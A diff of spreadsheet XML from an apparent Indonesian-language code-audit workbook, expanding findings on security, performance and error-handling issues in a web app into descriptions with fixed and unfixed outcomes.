+      </c>
+      <c r="E17" t="str">
+        <v>In-memory cache dengan TTL. Response instant untuk data yang sama.</v>
+      </c>
+      <c r="F17" t="str">
+        <v>Dashboard selalu lambat. User frustrasi.</v>
       </c>
     </row>
     <row r="18">
@@ -1025,10 +1197,16 @@
         <v>76 instances</v>
       </c>
       <c r="C18" t="str">
-        <v>.select(*) Overfetching</v>
+        <v>76 tempat menggunakan `.select()` tanpa column specification. Semua kolom diambil, termasuk yang tidak diperlukan.</v>
       </c>
       <c r="D18" t="str">
-        <v>Explicit column selection</v>
+        <v>Response payload besar. Bandwidth waste. Memory usage tinggi di server dan client.</v>
+      </c>
+      <c r="E18" t="str">
+        <v>Explicit column selection. Payload berkurang 50-80%. Lebih cepat.</v>
+      </c>
+      <c r="F18" t="str">
+        <v>Payload tetap besar. Performance penalty.</v>
       </c>
     </row>
     <row r="19">
@@ -1039,10 +1217,16 @@
         <v>portal.ts, admin.ts</v>
       </c>
       <c r="C19" t="str">
-        <v>Unbounded Queries</v>
+        <v>Beberapa query tidak menggunakan LIMIT. Jika data sangat banyak, query akan mengambil semua sekaligus.</v>
       </c>
       <c r="D19" t="str">
-        <v>Tambahkan pagination</v>
+        <v>Memory overflow untuk data besar. Timeout. Server crash.</v>
+      </c>
+      <c r="E19" t="str">
+        <v>Pagination membatasi results per page. Predictable memory usage.</v>
+      </c>
+      <c r="F19" t="str">
+        <v>Risiko OOM crash untuk data volume tinggi.</v>
       </c>
     </row>
     <row r="20">
@@ -1053,10 +1237,16 @@
         <v>src/routes/misc.ts:576</v>
       </c>
       <c r="C20" t="str">
-        <v>Missing Auth on /api/reports</v>
+        <v>Endpoint `/api/reports` yang menampilkan data penjualan tidak memiliki auth middleware.</v>
       </c>
       <c r="D20" t="str">
-        <v>Tambahkan requireAuth</v>
+        <v>Data penjualan ter-expose ke publik. Competitor bisa melihat revenue, product performance.</v>
+      </c>
+      <c r="E20" t="str">
+        <v>Hanya admin/authorized user yang bisa melihat reports.</v>
+      </c>
+      <c r="F20" t="str">
+        <v>Business data leak. Competitive disadvantage.</v>
       </c>
     </row>
     <row r="21">
@@ -1067,10 +1257,16 @@
         <v>src/routes/withdrawals.ts:27</v>
       </c>
       <c r="C21" t="str">
-        <v>Seller Balance Restoration Non-Atomic</v>
+        <v>Saat withdrawal gagal, balance dikembalikan dengan read-then-write. Tidak atomic.</v>
       </c>
       <c r="D21" t="str">
-        <v>Fetch current balance</v>
+        <v>Race condition — balance bisa di-overwrite jika ada concurrent transaction.</v>
+      </c>
+      <c r="E21" t="str">
+        <v>Fetch current balance dulu, lalu increment. Data konsisten.</v>
+      </c>
+      <c r="F21" t="str">
+        <v>Balance bisa salah setelah failed withdrawal.</v>
       </c>
     </row>
     <row r="22">
@@ -1081,10 +1277,16 @@
         <v>100+ &lt;img&gt; tags</v>
       </c>
       <c r="C22" t="str">
-        <v>Missing Image Lazy Loading</v>
+        <v>Lebih dari 100 tag `&lt;img&gt;` tidak menggunakan `loading="lazy"`. Semua gambar di-load sekaligus saat halaman dibuka.</v>
       </c>
       <c r="D22" t="str">
-        <v>Tambahkan loading="lazy"</v>
+        <v>Initial load time lambat. Bandwidth waste. Mobile user terdampak.</v>
+      </c>
+      <c r="E22" t="str">
+        <v>Lazy loading menunda load gambar yang belum visible. Load time membaik.</v>
+      </c>
+      <c r="F22" t="str">
+        <v>Gambar load sekaligus. Lambat di mobile/slow connection.</v>
       </c>
     </row>
     <row r="23">
@@ -1095,10 +1297,16 @@
         <v>src/App.tsx:162-175</v>
       </c>
       <c r="C23" t="str">
-        <v>Auth State Stale</v>
+        <v>Auth state menggunakan gate `isAuthInit` yang bisa menyebabkan stale data. Setelah login, state bisa masih menunjukkan "belum login" untuk sementara.</v>
       </c>
       <c r="D23" t="str">
-        <v>Hapus isAuthInit gate</v>
+        <v>Cross-account data leakage. User bisa melihat data user lain sebelum state ter-update.</v>
+      </c>
+      <c r="E23" t="str">
+        <v>Auth state selalu fresh. Tidak ada stale data.</v>
+      </c>
+      <c r="F23" t="str">
+        <v>Race condition pada auth. Data leak sesaat setelah login/logout.</v>
       </c>
     </row>
     <row r="24">
@@ -1109,27 +1317,34 @@
         <v>Multiple components</v>
       </c>
       <c r="C24" t="str">
-        <v>Z-index Conflicts</v>
+        <v>Tidak ada standardisasi z-index scale. Beberapa component menggunakan inline styles dengan z-index yang konflik.</v>
       </c>
       <c r="D24" t="str">
-        <v>Standardisasi z-index scale</v>
+        <v>Modal bisa tertutup oleh dropdown. Toast notification tertutup oleh sidebar. Visual overlap.</v>
+      </c>
+      <c r="E24" t="str">
+        <v>Standardized z-index scale. Visual hierarchy konsisten.</v>
+      </c>
+      <c r="F24" t="str">
+        <v>UI bugs secara berkala. User experience terganggu.</v>
       </c>
     </row>
   </sheetData>
   <ignoredErrors>
-    <ignoredError numberStoredAsText="1" sqref="A1:D24"/>
+    <ignoredError numberStoredAsText="1" sqref="A1:F24"/>
   </ignoredErrors>
 </worksheet>
 </file>
 
 <file path=xl/worksheets/sheet4.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:D21"/>
+  <dimension ref="A1:E21"/>
   <cols>
-    <col min="1" max="1" width="8.83203125" customWidth="1"/>
-    <col min="2" max="2" width="40.83203125" customWidth="1"/>
-    <col min="3" max="3" width="45.83203125" customWidth="1"/>
-    <col min="4" max="4" width="40.83203125" customWidth="1"/>
+    <col min="1" max="1" width="6.83203125" customWidth="1"/>
+    <col min="2" max="2" width="35.83203125" customWidth="1"/>
+    <col min="3" max="3" width="50.83203125" customWidth="1"/>
+    <col min="4" max="4" width="50.83203125" customWidth="1"/>
+    <col min="5" max="5" width="50.83203125" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="1">
@@ -1143,7 +1358,10 @@
         <v>Masalah</v>
       </c>
       <c r="D1" t="str">
-        <v>Fix</v>
+        <v>Jika Diperbaiki</v>
+      </c>
+      <c r="E1" t="str">
+        <v>Jika TIDAK Diperbaiki</v>
       </c>
     </row>
     <row r="2">
@@ -1151,13 +1369,16 @@
         <v>m01</v>
       </c>
       <c r="B2" t="str">
-        <v>Multiple</v>
+        <v>Multiple components</v>
       </c>
       <c r="C2" t="str">
-        <v>Missing aria-label</v>
+        <v>Banyak interactive elements (button, input, link) tidak memiliki aria-label. Screen reader tidak bisa membaca element dengan benar.</v>
       </c>
       <c r="D2" t="str">
-        <v>Tambahkan a11y attributes</v>
+        <v>Aksesibilitas improved. Compliance dengan WCAG standards.</v>
+      </c>
+      <c r="E2" t="str">
+        <v>Aksesibilitas tetap buruk. Potensi hukum (ADA compliance).</v>
       </c>
     </row>
     <row r="3">
@@ -1168,10 +1389,13 @@
         <v>server.ts:102</v>
       </c>
       <c r="C3" t="str">
-        <v>CSP allows unsafe-inline/eval</v>
+        <v>Content Security Policy mengizinkan `unsafe-inline` dan `unsafe-eval`. Ini menonaktifkan proteksi XSS dari CSP.</v>
       </c>
       <c r="D3" t="str">
-        <v>Hapus unsafe directives</v>
+        <v>CSP efektif. XSS lebih sulit dieksploitasi.</v>
+      </c>
+      <c r="E3" t="str">
+        <v>CSP hanya formalitas. Tidak ada perlindungan nyata.</v>
       </c>
     </row>
     <row r="4">
@@ -1182,10 +1406,13 @@
         <v>server.ts:74</v>
       </c>
       <c r="C4" t="str">
-        <v>trust proxy = 1</v>
+        <v>Express `trust proxy` di-set ke `1`. Jika deployment berada di belakang proxy yang lebih dari 1 hop, IP address tidak akurat.</v>
       </c>
       <c r="D4" t="str">
-        <v>Verify di belakang proxy</v>
+        <v>Trust proxy sesuai dengan deployment. IP akurat.</v>
+      </c>
+      <c r="E4" t="str">
+        <v>Rate limiting bisa di-bypass atau terlalu agresif.</v>
       </c>
     </row>
     <row r="5">
@@ -1196,10 +1423,13 @@
         <v>src/middleware/auth.ts:20</v>
       </c>
       <c r="C5" t="str">
-        <v>getUser DB call setiap request</v>
+        <v>Setiap HTTP request melakukan 1 DB call untuk verify session. Tidak ada caching.</v>
       </c>
       <c r="D5" t="str">
-        <v>Cache session</v>
+        <v>Session caching mengurangi DB calls 90%+.</v>
+      </c>
+      <c r="E5" t="str">
+        <v>DB load linear dengan traffic. Scaling limit lebih cepat tercapai.</v>
       </c>
     </row>
     <row r="6">
@@ -1210,10 +1440,13 @@
         <v>src/services/stock.js:48</v>
       </c>
       <c r="C6" t="str">
-        <v>Silent error catch</v>
+        <v>Error di stock operations di-catch tanpa logging. Error hilang begitu saja.</v>
       </c>
       <c r="D6" t="str">
-        <v>Tambahkan logging</v>
+        <v>Error logged. Bisa dideteksi dan diperbaiki lebih cepat.</v>
+      </c>
+      <c r="E6" t="str">
+        <v>Error silent. Potensi masalah yang tidak terdeteksi.</v>
       </c>
     </row>
     <row r="7">
@@ -1224,10 +1457,13 @@
         <v>src/routes/misc.ts:546</v>
       </c>
       <c r="C7" t="str">
-        <v>Log injection</v>
+        <v>User input di-log tanpa sanitization. Newlines atau control characters bisa di-inject.</v>
       </c>
       <c r="D7" t="str">
-        <v>Sanitize log input</v>
+        <v>Log aman dari injection. Integrity terjaga.</v>
+      </c>
+      <c r="E7" t="str">
+        <v>Log bisa dimanipulasi. Forensic analysis terganggu.</v>
       </c>
     </row>
     <row r="8">
@@ -1238,10 +1474,13 @@
         <v>src/services/email.js:82</v>
       </c>
       <c r="C8" t="str">
-        <v>HTML injection di email</v>
+        <v>User input di-inject ke email body tanpa HTML escaping.</v>
       </c>
       <c r="D8" t="str">
-        <v>Escape HTML</v>
+        <v>Email body aman. Tidak ada injection.</v>
+      </c>
+      <c r="E8" t="str">
+        <v>Email bisa digunakan untuk phishing.</v>
       </c>
     </row>
     <row r="9">
@@ -1252,10 +1491,13 @@
         <v>src/routes/transactions.ts:699-725</v>
       </c>
       <c r="C9" t="str">
-        <v>IDOR seller data</v>
+        <v>Seller bisa melihat data transaksi seller lain. Tidak ada ownership check.</v>
       </c>
       <c r="D9" t="str">
-        <v>Tambahkan auth check</v>
+        <v>Seller hanya bisa melihat data sendiri.</v>
+      </c>
+      <c r="E9" t="str">
+        <v>Data leak. Trust berkurang.</v>
       </c>
     </row>
     <row r="10">
@@ -1266,10 +1508,13 @@
         <v>server.ts:249-256</v>
       </c>
       <c r="C10" t="str">
-        <v>VA number logged</v>
+        <v>Virtual Account number di-log ke console. Jika log diakses attacker, VA bisa digunakan.</v>
       </c>
       <c r="D10" t="str">
-        <v>Hapus dari log</v>
+        <v>VA number tidak di-log. Aman.</v>
+      </c>
+      <c r="E10" t="str">
+        <v>VA number exposed di logs.</v>
       </c>
     </row>
     <row r="11">
@@ -1280,10 +1525,13 @@
         <v>src/services/payment.js:32</v>
       </c>
       <c r="C11" t="str">
-        <v>NaN handling</v>
+        <v>Tidak ada check apakah amount adalah NaN. Jika input tidak valid, NaN bisa menyebar ke calculations.</v>
       </c>
       <c r="D11" t="str">
-        <v>Tambahkan Number.isNaN check</v>
+        <v>NaN ditolak sebelum diproses. Data aman.</v>
+      </c>
+      <c r="E11" t="str">
+        <v>NaN bisa merusak data. Manual recovery diperlukan.</v>
       </c>
     </row>
     <row r="12">
@@ -1294,10 +1542,13 @@
         <v>Multiple</v>
       </c>
       <c r="C12" t="str">
-        <v>Duplicate routes (trailing slash)</v>
+        <v>Beberapa endpoint diduplikasi dengan dan tanpa trailing slash. Menghabiskan memory.</v>
       </c>
       <c r="D12" t="str">
-        <v>Hapus duplikat</v>
+        <v>Satu route saja. Clean.</v>
+      </c>
+      <c r="E12" t="str">
+        <v>Duplikat tetap ada. Minor waste.</v>
       </c>
     </row>
     <row r="13">
@@ -1308,10 +1559,13 @@
         <v>DashboardLayout.tsx:277-420</v>
       </c>
       <c r="C13" t="str">
-        <v>Nav recreate setiap render</v>
+        <v>Navigation items array di-recreate setiap render. Tidak di-memoize.</v>
       </c>
       <c r="D13" t="str">
-        <v>Memoize</v>
+        <v>Memoized. Hanya recreate saat data berubah.</v>
+      </c>
+      <c r="E13" t="str">
+        <v>Minor performance hit setiap render.</v>
       </c>
     </row>
     <row r="14">
@@ -1322,10 +1576,13 @@
         <v>DashboardLayout.tsx:145</v>
       </c>
       <c r="C14" t="str">
-        <v>Hardcoded SARIROTI_EMAILS</v>
+        <v>Daftar email Sariroti di-hardcode di component. Sulit diupdate.</v>
       </c>
       <c r="D14" t="str">
-        <v>Pindah ke constant</v>
+        <v>Pindah ke database atau environment variable.</v>
+      </c>
+      <c r="E14" t="str">
+        <v>Maintenance overhead.</v>
       </c>
     </row>
     <row r="15">
@@ -1336,10 +1593,13 @@
         <v>src/routes/admin.ts:6-15</v>
       </c>
       <c r="C15" t="str">
-        <v>Redundant auth check</v>
+        <v>Admin routes melakukan auth check dua kali: global middleware + local check.</v>
       </c>
       <c r="D15" t="str">
-        <v>Konsolidasi ke global middleware</v>
+        <v>Konsolidasi ke satu global check.</v>
+      </c>
+      <c r="E15" t="str">
+        <v>Redundancy tetap ada. Maintenance confusion.</v>
       </c>
     </row>
     <row r="16">
@@ -1350,10 +1610,13 @@
         <v>src/routes/diagnostics.ts:67-109</v>
       </c>
       <c r="C16" t="str">
-        <v>Debug routes leak data</v>
+        <v>Debug routes (system state, auth test) bisa diakses publik di production.</v>
       </c>
       <c r="D16" t="str">
-        <v>Hapus di production</v>
+        <v>Debug routes disabled di production.</v>
+      </c>
+      <c r="E16" t="str">
+        <v>Data internal ter-expose.</v>
       </c>
     </row>
     <row r="17">
@@ -1364,10 +1627,13 @@
         <v>background-jobs.js:26</v>
       </c>
       <c r="C17" t="str">
-        <v>dailyReport 60s interval</v>
+        <v>Daily report job berjalan setiap 60 detik, bukan setiap hari.</v>
       </c>
       <c r="D17" t="str">
-        <v>Kurangi ke 5 menit</v>
+        <v>Schedule sesuai kebutuhan. Resource efficient.</v>
+      </c>
+      <c r="E17" t="str">
+        <v>Wasted compute. Email flooding.</v>
       </c>
     </row>
     <row r="18">
@@ -1378,10 +1644,13 @@
         <v>App.tsx:120-130</v>
       </c>
       <c r="C18" t="str">
-        <v>Reload loop risk</v>
+        <v>Jika chunk load gagal, app reload tanpa batas. Infinite loop possible.</v>
       </c>
       <c r="D18" t="str">
-        <v>Tambahkan max retry</v>
+        <v>Max retry limit. Graceful degradation.</v>
+      </c>
+      <c r="E18" t="str">
+        <v>Infinite reload risk.</v>
       </c>
     </row>
     <row r="19">
@@ -1392,10 +1661,13 @@
         <v>server.ts:276-278</v>
       </c>
       <c r="C19" t="str">
-        <v>Interval pileup risk</v>
+        <v>Jika background job interval tidak di-clear, multiple intervals bisa berjalan bersamaan.</v>
       </c>
       <c r="D19" t="str">
-        <v>Tambahkan guard</v>
+        <v>Guard untuk prevent pileup.</v>
+      </c>
+      <c r="E19" t="str">
+        <v>Multiple intervals running simultaneously.</v>
       </c>
     </row>
     <row r="20">
@@ -1406,10 +1678,13 @@
         <v>Multiple</v>
       </c>
       <c r="C20" t="str">
-        <v>Missing Suspense boundaries</v>
+        <v>Beberapa lazy-loaded routes tidak memiliki Suspense fallback.</v>
       </c>
       <c r="D20" t="str">
-        <v>Tambahkan fallback</v>
+        <v>Loading indicator ditampilkan saat route load.</v>
+      </c>
+      <c r="E20" t="str">
+        <v>Flash of white screen.</v>
       </c>
     </row>
     <row r="21">
@@ -1420,27 +1695,32 @@
         <v>src/routes/portal.ts:16</v>
       </c>
       <c r="C21" t="str">
-        <v>Missing points_history index</v>
+        <v>Tidak ada index untuk `points_history` query yang sering digunakan.</v>
       </c>
       <c r="D21" t="str">
-        <v>Tambahkan index</v>
+        <v>Index mempercepat query.</v>
+      </c>
+      <c r="E21" t="str">
+        <v>Points history page lambat.</v>
       </c>
     </row>
   </sheetData>
   <ignoredErrors>
-    <ignoredError numberStoredAsText="1" sqref="A1:D21"/>
+    <ignoredError numberStoredAsText="1" sqref="A1:E21"/>
   </ignoredErrors>
 </worksheet>
 </file>
 
 <file path=xl/worksheets/sheet5.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:D11"/>
+  <dimension ref="A1:F11"/>
   <cols>
-    <col min="1" max="1" width="8.83203125" customWidth="1"/>
-    <col min="2" max="2" width="40.83203125" customWidth="1"/>
-    <col min="3" max="3" width="45.83203125" customWidth="1"/>
+    <col min="1" max="1" width="6.83203125" customWidth="1"/>
+    <col min="2" max="2" width="35.83203125" customWidth="1"/>
+    <col min="3" max="3" width="50.83203125" customWidth="1"/>
     <col min="4" max="4" width="50.83203125" customWidth="1"/>
+    <col min="5" max="5" width="50.83203125" customWidth="1"/>
+    <col min="6" max="6" width="50.83203125" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="1">
@@ -1456,6 +1736,12 @@
       <c r="D1" t="str">
         <v>Dampak</v>
       </c>
+      <c r="E1" t="str">
+        <v>Jika Diperbaiki</v>
+      </c>
+      <c r="F1" t="str">
+        <v>Jika TIDAK Diperbaiki</v>
+      </c>
     </row>
     <row r="2">
       <c r="A2" t="str">
@@ -1465,10 +1751,16 @@
         <v>KioskLayout.tsx:64-77</v>
       </c>
       <c r="C2" t="str">
-        <v>Error swallowed tanpa feedback</v>
+        <v>Fetch error di KioskLayout di-catch tanpa menampilkan error message ke user. User tidak tahu apa yang terjadi.</v>
       </c>
       <c r="D2" t="str">
-        <v>User tidak tahu API error</v>
+        <v>User melihat halaman kosong atau data tidak lengkap tanpa penjelasan. Mereka mungkin mengira aplikasi rusak.</v>
+      </c>
+      <c r="E2" t="str">
+        <v>Error message ditampilkan. User tahu ada masalah dan bisa retry.</v>
+      </c>
+      <c r="F2" t="str">
+        <v>User bingung. Churn risk.</v>
       </c>
     </row>
     <row r="3">
@@ -1479,10 +1771,16 @@
         <v>AdminDashboard.tsx:183-184</v>
       </c>
       <c r="C3" t="str">
-        <v>Promise.all catch = null</v>
+        <v>Promise.all untuk dashboard data di-catch dengan handler kosong. Jika ada error, dashboard kosong tanpa penjelasan.</v>
       </c>
       <c r="D3" t="str">
-        <v>Dashboard kosong tanpa penjelasan</v>
+        <v>Admin melihat dashboard kosong. Mereka tidak tahu apakah memang tidak ada data atau ada error.</v>
+      </c>
+      <c r="E3" t="str">
+        <v>Error ditampilkan. Admin tahu ada masalah.</v>
+      </c>
+      <c r="F3" t="str">
+        <v>Dashboard ambigu. Admin bisa membuat keputusan salah.</v>
       </c>
     </row>
     <row r="4">
@@ -1493,10 +1791,16 @@
         <v>PortalFormView.tsx:212-215</v>
       </c>
       <c r="C4" t="str">
-        <v>Registration check gagal silent</v>
+        <v>Pengecekan apakah user sudah terdaftar untuk program gagal tanpa feedback. User bisa mendaftar duplikat.</v>
       </c>
       <c r="D4" t="str">
-        <v>Bisa daftar duplikat</v>
+        <v>Double registration. Double points deduction. Admin harus reject manual.</v>
+      </c>
+      <c r="E4" t="str">
+        <v>Error ditampilkan. User tahu ada masalah dan tidak bisa proceed.</v>
+      </c>
+      <c r="F4" t="str">
+        <v>Duplikat registration. Data inconsistency.</v>
       </c>
     </row>
     <row r="5">
@@ -1507,10 +1811,16 @@
         <v>useCartStore.ts:71-78</v>
       </c>
       <c r="C5" t="str">
-        <v>updateQuantity(0) tidak remove</v>
+        <v>Jika quantity diupdate ke 0, item tidak dihapus dari cart. Zombie items tetap ada.</v>
       </c>
       <c r="D5" t="str">
-        <v>Zombie items, cart count salah</v>
+        <v>Cart count salah. User bisa checkout dengan item yang seharusnya tidak ada.</v>
+      </c>
+      <c r="E5" t="str">
+        <v>Quantity 0 = remove. Cart selalu akurat.</v>
+      </c>
+      <c r="F5" t="str">
+        <v>Zombie items. Cart inaccurate.</v>
       </c>
     </row>
     <row r="6">
@@ -1521,10 +1831,16 @@
         <v>History.tsx:67-82</v>
       </c>
       <c r="C6" t="str">
-        <v>Polling timeout setelah unmount</v>
+        <v>Polling interval tidak di-clear saat component unmount. State update dilakukan pada unmounted component.</v>
       </c>
       <c r="D6" t="str">
-        <v>State update on unmounted</v>
+        <v>React warning. Memory leak. Potential crash.</v>
+      </c>
+      <c r="E6" t="str">
+        <v>Cleanup interval di useEffect return.</v>
+      </c>
+      <c r="F6" t="str">
+        <v>Memory leak. React warnings.</v>
       </c>
     </row>
     <row r="7">
@@ -1535,10 +1851,16 @@
         <v>App.tsx:120-130</v>
       </c>
       <c r="C7" t="str">
-        <v>Reload loop pada chunk error</v>
+        <v>Jika JavaScript chunk load gagal, app reload. Tidak ada max retry. Bisa infinite loop.</v>
       </c>
       <c r="D7" t="str">
-        <v>Infinite reload</v>
+        <v>Browser hang. User harus force close.</v>
+      </c>
+      <c r="E7" t="str">
+        <v>Max retry limit. Graceful degradation.</v>
+      </c>
+      <c r="F7" t="str">
+        <v>Infinite reload. Browser unresponsive.</v>
       </c>
     </row>
     <row r="8">
@@ -1549,10 +1871,16 @@
         <v>stock.ts:14</v>
       </c>
       <c r="C8" t="str">
-        <v>Insert error tidak di-handle</v>
+        <v>Insert ke `stock_requests` gagal tanpa error handling. Request hilang begitu saja.</v>
       </c>
       <c r="D8" t="str">
-        <v>Stock request gagal silent</v>
+        <v>Restock request tidak tercatat. Admin tidak tahu ada request.</v>
+      </c>
+      <c r="E8" t="str">
+        <v>Error ditampilkan. User bisa retry.</v>
+      </c>
+      <c r="F8" t="str">
+        <v>Request hilang. Stok tidak pernah di-restock.</v>
       </c>
     </row>
     <row r="9">
@@ -1563,10 +1891,16 @@
         <v>withdrawals.ts:62</v>
       </c>
       <c r="C9" t="str">
-        <v>Balance restore error tidak di-handle</v>
+        <v>Jika withdrawal gagal dan balance restore error, error tidak di-handle. Seller bisa rugi.</v>
       </c>
       <c r="D9" t="str">
-        <v>Seller rugi tanpa trace</v>
+        <v>Balance seller hilang tanpa trace. Manual fix diperlukan.</v>
+      </c>
+      <c r="E9" t="str">
+        <v>Error logged dan ditampilkan. Admin bisa intervensi.</v>
+      </c>
+      <c r="F9" t="str">
+        <v>Balance leak. Seller rugi.</v>
       </c>
     </row>
     <row r="10">
@@ -1577,10 +1911,16 @@
         <v>payments.ts:92</v>
       </c>
       <c r="C10" t="str">
-        <v>API key missing → empty string</v>
+        <v>Jika `GROQ_API_KEY` tidak di-set, nilainya empty string. Groq calls gagal dengan error yang tidak jelas.</v>
       </c>
       <c r="D10" t="str">
-        <v>Groq calls gagal unhelpful</v>
+        <v>AI features tidak berfungsi. Error message tidak membantu debugging.</v>
+      </c>
+      <c r="E10" t="str">
+        <v>Validasi API key saat startup. Error jelas.</v>
+      </c>
+      <c r="F10" t="str">
+        <v>Silent failure. Debugging sulit.</v>
       </c>
     </row>
     <row r="11">
@@ -1588,18 +1928,24 @@
         <v>s10</v>
       </c>
       <c r="B11" t="str">
-        <v>Multiple</v>
+        <v>Multiple files</v>
       </c>
       <c r="C11" t="str">
-        <v>@ts-nocheck disables type safety</v>
+        <v>Beberapa file menggunakan `// @ts-nocheck`. TypeScript tidak bisa mendeteksi type errors.</v>
       </c>
       <c r="D11" t="str">
-        <v>Null checks terlewat</v>
+        <v>Null checks terlewat. Type errors muncul di runtime.</v>
+      </c>
+      <c r="E11" t="str">
+        <v>Type safety aktif. Error terdeteksi saat compile.</v>
+      </c>
+      <c r="F11" t="str">
+        <v>Runtime errors yang seharusnya terdeteksi lebih awal.</v>
       </c>
     </row>
   </sheetData>
   <ignoredErrors>
-    <ignoredError numberStoredAsText="1" sqref="A1:D11"/>
+    <ignoredError numberStoredAsText="1" sqref="A1:F11"/>
   </ignoredErrors>
 </worksheet>
 </file>
@@ -1609,7 +1955,7 @@
   <dimension ref="A1:C4"/>
   <cols>
     <col min="1" max="1" width="10.83203125" customWidth="1"/>
-    <col min="2" max="2" width="15.83203125" customWidth="1"/>
+    <col min="2" max="2" width="35.83203125" customWidth="1"/>
     <col min="3" max="3" width="80.83203125" customWidth="1"/>
   </cols>
   <sheetData>
@@ -1629,7 +1975,7 @@
         <v>1</v>
       </c>
       <c r="B2" t="str">
-        <v>Minggu Ini</v>
+        <v>Minggu Ini — CRITICAL</v>
       </c>
       <c r="C2" t="str">
         <v>C04, C05, C06, C01, C02, C03, C10, C13, C14, C08</v>
@@ -1640,7 +1986,7 @@
         <v>2</v>
       </c>
       <c r="B3" t="str">
-        <v>2 Minggu</v>
+        <v>2 Minggu — MAJOR</v>
       </c>
       <c r="C3" t="str">
         <v>M01, M06, M07, M08, M11, M13, M14, M16, M17</v>
@@ -1651,7 +1997,7 @@
         <v>3</v>
       </c>
       <c r="B4" t="str">
-        <v>Bulanan</v>
+        <v>Bulan Depan — MINOR/SILENT</v>
       </c>
       <c r="C4" t="str">
         <v>Semua MINOR + SILENT</v>

</xml_diff>